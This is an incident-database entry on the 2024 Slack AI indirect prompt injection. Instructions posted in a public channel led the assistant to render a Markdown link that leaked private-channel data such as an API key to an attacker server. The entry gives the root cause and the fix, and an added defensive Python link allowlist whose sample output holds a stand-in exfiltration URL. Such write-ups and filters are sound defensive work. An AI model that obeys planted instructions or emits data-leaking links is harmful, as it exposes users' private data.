Indirect Prompt Injection · High
Slack AI private-channel data exfiltration
August 2024 · Slack AI
What happened
An attacker who could post in any public channel could plant instructions that Slack AI later executed for a victim with private-channel access, rendering a Markdown link that leaked private content such as an API key to an attacker server.
Root cause
Slack AI ingested public-channel content as trusted context and rendered attacker-controlled Markdown links, enabling exfiltration without the attacker accessing the private data directly.
Fix / outcome
Slack investigated and deployed a patch, stating it found no evidence of unauthorized customer-data access.
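One output-side control for the root cause described above, as an added example that is not part of the original entry and is not Slack's patch: links in model output stay clickable only when their host is on an allowlist. `ALLOWED_HOSTS`, the host names and the sample text are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Assumption: hosts this deployment trusts for clickable links in AI answers.
ALLOWED_HOSTS = {"workspace.example.com", "docs.example.com"}

# Inline Markdown links and images: [text](url) / ![alt](url "title")
MD_LINK = re.compile(r'!?\[([^\]]*)\]\(\s*<?([^)\s>]+)>?[^)]*\)')
# Bare URLs (also covers reference-style definitions and client auto-linking).
BARE_URL = re.compile(r'https?://[^\s<>()\]]+', re.IGNORECASE)

def host_allowed(url: str) -> bool:
    """True only for https URLs whose parsed host is exactly allowlisted."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return False
    host = (parts.hostname or "").lower()  # ignores any userinfo before '@'
    return parts.scheme.lower() == "https" and host in ALLOWED_HOSTS

def neutralize_links(model_output: str):
    """Return (safe_text, blocked_urls); untrusted links become plain text."""
    blocked = []

    def fix_md(m):
        if host_allowed(m.group(2)):
            return m.group(0)
        blocked.append(m.group(2))
        return f"{m.group(1)} [link removed]"

    def fix_bare(m):
        if host_allowed(m.group(0)):
            return m.group(0)
        blocked.append(m.group(0))
        return "[link removed]"

    text = MD_LINK.sub(fix_md, model_output)
    return BARE_URL.sub(fix_bare, text), blocked

# Constructed sample of model output that mixes a trusted and an untrusted link.
SAMPLE = ("Summary ready. [open details](https://attacker.example/?d=PLACEHOLDER) "
          "See [the runbook](https://docs.example.com/runbook).")

if __name__ == "__main__":
    safe, blocked = neutralize_links(SAMPLE)
    print(safe)
    print("blocked:", blocked)  # log these: a blocked link is a detection signal
```

Run it on the final model output, after generation and before rendering, so it applies regardless of which ingested message carried the instruction.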
This incident is an example of Indirect Prompt Injection.